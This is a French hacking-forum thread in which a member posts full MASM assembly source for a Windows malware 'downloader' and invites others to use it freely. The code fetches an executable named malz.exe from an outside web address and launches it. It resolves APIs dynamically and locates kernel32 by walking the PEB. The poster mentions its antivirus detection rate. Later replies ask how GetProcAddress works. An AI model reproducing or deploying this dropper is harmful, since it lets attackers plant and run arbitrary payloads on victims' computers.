Vous êtes au niveau: Accueil / N-PN White-Hat Project / Programmation / Langages compilés / [MASM]Win32.Downloader





  • STATISTIQUES
  • Il y a eu un total de 2 membres et 13383 visiteurs sur le site dans les dernières 24h pour un total de 13 385 personnes!


    Membres: 2 433
    Discussions: 3 585
    Messages: 32 832
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Hackfest
    Le Hackfest est un évènement de sécurité et de piratage informatique au Québec reg...
    Hacking
    [EN] This is legal
    Basic: 10, Realistic: 5, Programming: 1, Bonus: 11, SQL: 2, Encryption: 6, Application: 4, User Contributed: 3
    Challenges
    [FR] PHP France
    Pour tout savoir sur le PHP, en français. Vous trouverez des tutoriels, des exemples, des astuces, toute la do...
    Hacking
    [FR] apprendre-a-manipuler
    Site d'apprentissage de la manipulation d'autrui.
    Hacking
    [FR] Le top web
    Nous offrons une sélection la plus large possible de resources webmaster gratuites, hébergement gratuit...
    Webmaster
    [EN] Exploit-db
    Une base de données d'exploits triés par genre (GHDB, Remote, Local, Web, DOS, ShellCode) à ...
    Vulnérabilités
    [EN] xda-developers
    Très bon site pour les gros bidouilleurs de smartphone de windows à androïd et de Apple jusqu'...
    Phreaking

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Affichage hiérarchique
[MASM]Win32.Downloader
02-11-2013, 05h53 (Modification du message : 02-11-2013, 14h16 par EpicOut.)
Message : #1
EpicOut Hors ligne
Membre actif
*



Messages : 121
Sujets : 10
Points: 23
Inscription : Feb 2012
[MASM]Win32.Downloader
Hello, voici un downloader méga simple que j'ai fait via MASM, je l'ait fait pour le fun et pas pour faire chier des gens avec des malwares de merde, faites en ce que vous voulez, j'en ai rien à foutre, sous WTFPL, il est à 16/48 (plus maintenant, je l'ai scanné avec vt), si vous avez des questions sur son fonctionnement ou autre, n'hésitez pas à me mp, j'suis dispo.

Code :
.386
.model flat, stdcall
option casemap :none  ; case sensitive

include windows.inc

include kernel32.inc
includelib kernel32.lib

assume fs:nothing
.data
ExeFile db "http://www.epicworld.fr/malz.exe",0
PathTarget db "C:\Users\malz.exe",0
LpStartup STARTUPINFO <>
ProcessInfo PROCESS_INFORMATION <>
dll1 db "urlmon.dll",0
dllfunc1 db "URLDownloadToFileA",0
dllfunc2 db "CreateProcessA",0
signature db "Downloader by EpicOut - 2013",0
.data?
hModule dd ?
.code
start:
call download
call execute
call exit

download:
invoke LoadLibrary,addr dll1
invoke GetProcAddress,eax,addr dllfunc1
push NULL
push 0
push offset PathTarget
push offset ExeFile
push NULL
call eax
ret

execute:
call get_kernel32
invoke GetProcAddress,hModule,addr dllfunc2
push offset ProcessInfo
push offset LpStartup
push NULL
push NULL
push NULL
push TRUE
push NULL
push NULL
push NULL
push offset PathTarget
call eax
ret

exit:
invoke ExitProcess,0
ret

get_kernel32:
xor eax, eax
mov eax, fs:[30h]
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
mov ecx,2
loop_:
mov eax, [eax]
loop loop_
mov eax, [eax+18h]
mov hModule,eax
xor eax, eax
ret
end start
Plein de mouches peuvent rentrer en boucle close.
[Image: vQs9wRu.png]
+1 (3) -1 (0) Répondre
02-11-2013, 11h02
Message : #2
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: [MASM]Win32.Downloader
Cool ! Smile
j'ai jamais utilisé les fonctions GetProcAddress ! et je ne savais pas qu'on pouvais faire ca pour utiliser des fonction externe comme celles d'Urlmon !
C'est ce qu'on appel "chargé une dll en memoire " ?
SakiiR.Ovh
Site web
+1 (0) -1 (0) Répondre
02-11-2013, 11h07 (Modification du message : 02-11-2013, 11h09 par EpicOut.)
Message : #3
EpicOut Hors ligne
Membre actif
*



Messages : 121
Sujets : 10
Points: 23
Inscription : Feb 2012
RE: [MASM]Win32.Downloader
Bah enfait, tant que tu as l'imagebase de la dll où se trouve ta fonction ça fonctionne.
Et ouais ça s'appelle charger en mémoire.
Plein de mouches peuvent rentrer en boucle close.
[Image: vQs9wRu.png]
+1 (0) -1 (0) Répondre
02-11-2013, 13h57
Message : #4
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: [MASM]Win32.Downloader
Faut vraiment ue je vois Le Format PE deja ^^
SakiiR.Ovh
Site web
+1 (0) -1 (0) Répondre
02-11-2013, 14h06 (Modification du message : 02-11-2013, 14h06 par EpicOut.)
Message : #5
EpicOut Hors ligne
Membre actif
*



Messages : 121
Sujets : 10
Points: 23
Inscription : Feb 2012
RE: [MASM]Win32.Downloader
C'est pas sorcier, y'a pas mal de ressources sur le web, mais t'attends pas non plus à que tout soit documenté.
Plein de mouches peuvent rentrer en boucle close.
[Image: vQs9wRu.png]
+1 (0) -1 (0) Répondre
02-11-2013, 17h10
Message : #6
sakiir Hors ligne
[sakiir@Ubuntu]:~$ ./ExploitMe ShellC0de
*



Messages : 411
Sujets : 51
Points: 34
Inscription : Sep 2012
RE: [MASM]Win32.Downloader
ouai nan mais je sais ou regarder ! j'ai deja lu sur re-xe.com
SakiiR.Ovh
Site web
+1 (0) -1 (0) Répondre


Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  [MASM] Extracteur de dll pour Backdoor.Win32.Papras Horgh 10 2,256 25-04-2013, 13h41
Dernier message: Kiwazaru
  [C] [Win32] Injection de DLL dans un process avant son initialisation supersnail 4 1,717 26-03-2013, 23h27
Dernier message: fr0g

Atteindre :


Utilisateur(s) parcourant ce sujet : 6 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut